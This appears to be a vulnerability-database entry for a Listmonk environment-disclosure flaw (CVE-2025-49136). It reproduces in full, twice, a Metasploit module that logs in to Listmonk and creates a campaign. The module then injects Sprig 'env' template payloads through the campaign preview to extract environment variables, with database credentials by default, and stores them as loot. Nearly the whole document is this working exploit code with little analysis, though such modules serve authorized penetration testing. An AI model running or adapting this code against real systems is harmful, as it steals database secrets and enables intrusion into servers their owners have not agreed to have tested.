Listmonk Insecure Sprig Template Functions Environment Disclosure_MSF:AUXILIARY-GATHER-LISTMONK_ENV_DISCLOSURE-

9 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Description

This module exploits insecure Sprig template functions in Listmonk versions prior to v5.0.2. The env and expandenv functions are enabled ...

Visit Original Source

Basic Information

ID MSF:AUXILIARY-GATHER-LISTMONK_ENV_DISCLOSURE-

Published Oct 9, 2025 at 18:53

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Listmonk Insecure Sprig Template Functions Environment Disclosure',
'Description' => %q{
This module exploits insecure Sprig template functions in Listmonk
versions prior to v5.0.2. The env and expandenv functions are enabled
by default, allowing authenticated users with campaign permissions to
extract sensitive environment variables via campaign preview.
},
'Author' => ['Tarek Nakkouch'],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-49136'],
['URL', 'https://github.com/knadh/listmonk/security/advisories/GHSA-jc7g-x28f-3v3h']
],
'DisclosureDate' => '2025-06-08',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)

register_options([
Opt::RPORT(9000),
OptString.new('TARGETURI', [true, 'Base path to Listmonk', '/']),
OptString.new('USERNAME', [true, 'Listmonk username']),
OptString.new('PASSWORD', [true, 'Listmonk password']),
OptString.new('ENVVAR', [false, 'Comma-separated list of environment variables to read (uses default list if not set)']),
OptString.new('CAMPAIGN_NAME', [false, 'Campaign name (random if not set)'])
])
end

def check
begin
login
rescue Msf::Exploit::Failed
return Msf::Exploit::CheckCode::Unknown('Authentication failed')
end

res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'api', 'about')
})

return Msf::Exploit::CheckCode::Unknown('Connection failed') unless res

if res.code == 200
json = res.get_json_document
return Msf::Exploit::CheckCode::Unknown('Failed to parse version information') unless json

if json['version']
version_string = json['version'].gsub(/^v/, '')
version = Rex::Version.new(version_string)
if version >= Rex::Version.new('4.0.0') && version < Rex::Version.new('5.0.2')
return Msf::Exploit::CheckCode::Appears("Listmonk version #{version_string} is vulnerable")
else
return Msf::Exploit::CheckCode::Safe("Listmonk version #{version_string} is patched")
end
end
end

Msf::Exploit::CheckCode::Unknown('Could not determine if target is running Listmonk')
end

def get_nonce
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin', 'login')
})

fail_with(Failure::Unreachable, 'Connection failed') unless res

html = res.get_html_document
fail_with(Failure::UnexpectedReply, 'Could not parse HTML login page') unless html

nonce = html.at('input[@name="nonce"]/@value')
fail_with(Failure::UnexpectedReply, 'Could not extract nonce from login page') unless nonce

nonce.text
end

def login
nonce = get_nonce

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'login'),
'keep_cookies' => true,
'vars_post' => {
'nonce' => nonce,
'next' => '/admin',
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
})

fail_with(Failure::Unreachable, 'Connection failed during login') unless res

if res.code == 302
print_good('Login successful')
else
fail_with(Failure::NoAccess, "Login failed with code #{res.code}")
end
end

def create_campaign
# Use random campaign name to avoid collisions on re-runs and reduce fingerprinting
campaign_name = datastore['CAMPAIGN_NAME'] || Rex::Text.rand_text_alpha(8..12)

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'api', 'campaigns'),
'ctype' => 'application/json',
'data' => {
'archiveSlug' => campaign_name,
'name' => campaign_name,
'subject' => campaign_name,
'lists' => [1],
'from_email' => 'listmonk <[email protected]>',
'content_type' => 'richtext',
'messenger' => 'email',
'type' => 'regular',
'tags' => [],
'send_at' => nil,
'headers' => [],
'media' => []
}.to_json
})

fail_with(Failure::Unreachable, 'Connection failed during campaign creation') unless res

if res.code == 200
parsed = res.get_json_document
fail_with(Failure::UnexpectedReply, 'Failed to parse campaign creation response') unless parsed

campaign_id = parsed['data']['id']
vprint_status("Campaign created with ID: #{campaign_id}")
return campaign_id
else
fail_with(Failure::Unknown, "Failed to create campaign: #{res.code}")
end
end

def preview_campaign(campaign_id, payload)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'api', 'campaigns', campaign_id.to_s, 'preview'),
'vars_post' => {
'template_id' => '1',
'content_type' => 'richtext',
'body' => payload
}
})

fail_with(Failure::Unreachable, 'Connection failed during preview') unless res

fail_with(Failure::Unknown, "Preview failed with code: #{res.code}") unless res.code == 200
extract_results(res.body)
end

def default_env_vars
[
'LISTMONK_db__host',
'LISTMONK_db__port',
'LISTMONK_db__user',
'LISTMONK_db__password',
'LISTMONK_db__database',
'LISTMONK_app__address'
]
end

def delete_campaign(campaign_id)
res = send_request_cgi({
'method' => 'DELETE',
'uri' => normalize_uri(target_uri.path, 'api', 'campaigns', campaign_id.to_s)
})

if res && res.code == 200
vprint_good("Campaign #{campaign_id} deleted successfully")
else
print_warning("Failed to delete campaign #{campaign_id}")
end
end

def extract_results(html)
doc = Nokogiri::HTML(html)
wrap_div = doc.at('div[@class="wrap"]')
fail_with(Failure::UnexpectedReply, 'Could not find wrap div in response') unless wrap_div

paragraphs = wrap_div.search('p').map(&:text).map(&:strip).reject(&:empty?)

if paragraphs.any?
print_good('Environment variable(s) extracted:')
print_line('')
paragraphs.each do |result|
print_line(result.to_s)
end

loot_data = paragraphs.join("\n")
store_loot(
'listmonk.env',
'text/plain',
rhost,
loot_data,
'listmonk_env_disclosure.txt',
'Listmonk Environment Variables'
)
print_line('')

return paragraphs
else
print_error('No results found in response')
return []
end
end

def run
print_status("Targeting #{full_uri}")

# Determine which environment variables to extract
if datastore['ENVVAR']
env_vars = datastore['ENVVAR'].split(',').map(&:strip)
print_status("Targeting specific environment variables: #{env_vars.join(', ')}")
else
env_vars = default_env_vars
print_status("Using default environment variable list (#{env_vars.length} variables)")
end

# Build payload with all environment variables
payload_parts = env_vars.map do |var|
"<p>#{var}: {{ env \"#{var}\" }}</p>"
end
payload = payload_parts.join

login

begin
campaign_id = create_campaign
print_status('Executing template to extract environment variables...')
preview_campaign(campaign_id, payload)
ensure
# Clean up by deleting the campaign even if extraction fails
delete_campaign(campaign_id) if campaign_id
end
end
end

{
    "lastseen": "2025-10-09T20:02:17",
    "description": "This module exploits insecure Sprig template functions in Listmonk           versions prior to v5.0.2. The env and expandenv functions are enabled      ...",
    "published": "2025-10-09T18:53:51",
    "modified": "2025-10-09T18:53:51",
    "type": "metasploit",
    "title": "Listmonk Insecure Sprig Template Functions Environment Disclosure",
    "source": "",
    "references": "",
    "id": "MSF:AUXILIARY-GATHER-LISTMONK_ENV_DISCLOSURE-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-49136"
    ],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n  include Msf::Exploit::Remote::HttpClient\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Listmonk Insecure Sprig Template Functions Environment Disclosure',\n        'Description' => %q{\n          This module exploits insecure Sprig template functions in Listmonk\n          versions prior to v5.0.2. The env and expandenv functions are enabled\n          by default, allowing authenticated users with campaign permissions to\n          extract sensitive environment variables via campaign preview.\n        },\n        'Author' => ['Tarek Nakkouch'],\n        'License' => MSF_LICENSE,\n        'References' => [\n          ['CVE', '2025-49136'],\n          ['URL', 'https://github.com/knadh/listmonk/security/advisories/GHSA-jc7g-x28f-3v3h']\n        ],\n        'DisclosureDate' => '2025-06-08',\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'SideEffects' => [IOC_IN_LOGS],\n          'Reliability' => []\n        }\n      )\n    )\n\n    register_options([\n      Opt::RPORT(9000),\n      OptString.new('TARGETURI', [true, 'Base path to Listmonk', '/']),\n      OptString.new('USERNAME', [true, 'Listmonk username']),\n      OptString.new('PASSWORD', [true, 'Listmonk password']),\n      OptString.new('ENVVAR', [false, 'Comma-separated list of environment variables to read (uses default list if not set)']),\n      OptString.new('CAMPAIGN_NAME', [false, 'Campaign name (random if not set)'])\n    ])\n  end\n\n  def check\n    begin\n      login\n    rescue Msf::Exploit::Failed\n      return Msf::Exploit::CheckCode::Unknown('Authentication failed')\n    end\n\n    res = send_request_cgi({\n      'method' => 'GET',\n      'uri' => normalize_uri(target_uri.path, 'api', 'about')\n    })\n\n    return Msf::Exploit::CheckCode::Unknown('Connection failed') unless res\n\n    if res.code == 200\n      json = res.get_json_document\n      return Msf::Exploit::CheckCode::Unknown('Failed to parse version information') unless json\n\n      if json['version']\n        version_string = json['version'].gsub(/^v/, '')\n        version = Rex::Version.new(version_string)\n        if version >= Rex::Version.new('4.0.0') && version < Rex::Version.new('5.0.2')\n          return Msf::Exploit::CheckCode::Appears(\"Listmonk version #{version_string} is vulnerable\")\n        else\n          return Msf::Exploit::CheckCode::Safe(\"Listmonk version #{version_string} is patched\")\n        end\n      end\n    end\n\n    Msf::Exploit::CheckCode::Unknown('Could not determine if target is running Listmonk')\n  end\n\n  def get_nonce\n    res = send_request_cgi({\n      'method' => 'GET',\n      'uri' => normalize_uri(target_uri.path, 'admin', 'login')\n    })\n\n    fail_with(Failure::Unreachable, 'Connection failed') unless res\n\n    html = res.get_html_document\n    fail_with(Failure::UnexpectedReply, 'Could not parse HTML login page') unless html\n\n    nonce = html.at('input[@name=\"nonce\"]/@value')\n    fail_with(Failure::UnexpectedReply, 'Could not extract nonce from login page') unless nonce\n\n    nonce.text\n  end\n\n  def login\n    nonce = get_nonce\n\n    res = send_request_cgi({\n      'method' => 'POST',\n      'uri' => normalize_uri(target_uri.path, 'admin', 'login'),\n      'keep_cookies' => true,\n      'vars_post' => {\n        'nonce' => nonce,\n        'next' => '/admin',\n        'username' => datastore['USERNAME'],\n        'password' => datastore['PASSWORD']\n      }\n    })\n\n    fail_with(Failure::Unreachable, 'Connection failed during login') unless res\n\n    if res.code == 302\n      print_good('Login successful')\n    else\n      fail_with(Failure::NoAccess, \"Login failed with code #{res.code}\")\n    end\n  end\n\n  def create_campaign\n    # Use random campaign name to avoid collisions on re-runs and reduce fingerprinting\n    campaign_name = datastore['CAMPAIGN_NAME'] || Rex::Text.rand_text_alpha(8..12)\n\n    res = send_request_cgi({\n      'method' => 'POST',\n      'uri' => normalize_uri(target_uri.path, 'api', 'campaigns'),\n      'ctype' => 'application/json',\n      'data' => {\n        'archiveSlug' => campaign_name,\n        'name' => campaign_name,\n        'subject' => campaign_name,\n        'lists' => [1],\n        'from_email' => 'listmonk <[email protected]>',\n        'content_type' => 'richtext',\n        'messenger' => 'email',\n        'type' => 'regular',\n        'tags' => [],\n        'send_at' => nil,\n        'headers' => [],\n        'media' => []\n      }.to_json\n    })\n\n    fail_with(Failure::Unreachable, 'Connection failed during campaign creation') unless res\n\n    if res.code == 200\n      parsed = res.get_json_document\n      fail_with(Failure::UnexpectedReply, 'Failed to parse campaign creation response') unless parsed\n\n      campaign_id = parsed['data']['id']\n      vprint_status(\"Campaign created with ID: #{campaign_id}\")\n      return campaign_id\n    else\n      fail_with(Failure::Unknown, \"Failed to create campaign: #{res.code}\")\n    end\n  end\n\n  def preview_campaign(campaign_id, payload)\n    res = send_request_cgi({\n      'method' => 'POST',\n      'uri' => normalize_uri(target_uri.path, 'api', 'campaigns', campaign_id.to_s, 'preview'),\n      'vars_post' => {\n        'template_id' => '1',\n        'content_type' => 'richtext',\n        'body' => payload\n      }\n    })\n\n    fail_with(Failure::Unreachable, 'Connection failed during preview') unless res\n\n    fail_with(Failure::Unknown, \"Preview failed with code: #{res.code}\") unless res.code == 200\n    extract_results(res.body)\n  end\n\n  def default_env_vars\n    [\n      'LISTMONK_db__host',\n      'LISTMONK_db__port',\n      'LISTMONK_db__user',\n      'LISTMONK_db__password',\n      'LISTMONK_db__database',\n      'LISTMONK_app__address'\n    ]\n  end\n\n  def delete_campaign(campaign_id)\n    res = send_request_cgi({\n      'method' => 'DELETE',\n      'uri' => normalize_uri(target_uri.path, 'api', 'campaigns', campaign_id.to_s)\n    })\n\n    if res && res.code == 200\n      vprint_good(\"Campaign #{campaign_id} deleted successfully\")\n    else\n      print_warning(\"Failed to delete campaign #{campaign_id}\")\n    end\n  end\n\n  def extract_results(html)\n    doc = Nokogiri::HTML(html)\n    wrap_div = doc.at('div[@class=\"wrap\"]')\n    fail_with(Failure::UnexpectedReply, 'Could not find wrap div in response') unless wrap_div\n\n    paragraphs = wrap_div.search('p').map(&:text).map(&:strip).reject(&:empty?)\n\n    if paragraphs.any?\n      print_good('Environment variable(s) extracted:')\n      print_line('')\n      paragraphs.each do |result|\n        print_line(result.to_s)\n      end\n\n      loot_data = paragraphs.join(\"\\n\")\n      store_loot(\n        'listmonk.env',\n        'text/plain',\n        rhost,\n        loot_data,\n        'listmonk_env_disclosure.txt',\n        'Listmonk Environment Variables'\n      )\n      print_line('')\n\n      return paragraphs\n    else\n      print_error('No results found in response')\n      return []\n    end\n  end\n\n  def run\n    print_status(\"Targeting #{full_uri}\")\n\n    # Determine which environment variables to extract\n    if datastore['ENVVAR']\n      env_vars = datastore['ENVVAR'].split(',').map(&:strip)\n      print_status(\"Targeting specific environment variables: #{env_vars.join(', ')}\")\n    else\n      env_vars = default_env_vars\n      print_status(\"Using default environment variable list (#{env_vars.length} variables)\")\n    end\n\n    # Build payload with all environment variables\n    payload_parts = env_vars.map do |var|\n      \"<p>#{var}: {{ env \\\"#{var}\\\" }}</p>\"\n    end\n    payload = payload_parts.join\n\n    login\n\n    begin\n      campaign_id = create_campaign\n      print_status('Executing template to extract environment variables...')\n      preview_campaign(campaign_id, payload)\n    ensure\n      # Clean up by deleting the campaign even if extraction fails\n      delete_campaign(campaign_id) if campaign_id\n    end\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/listmonk_env_disclosure.rb",
    "cvss": {
        "score": 9,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/auxiliary/gather/listmonk_env_disclosure/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply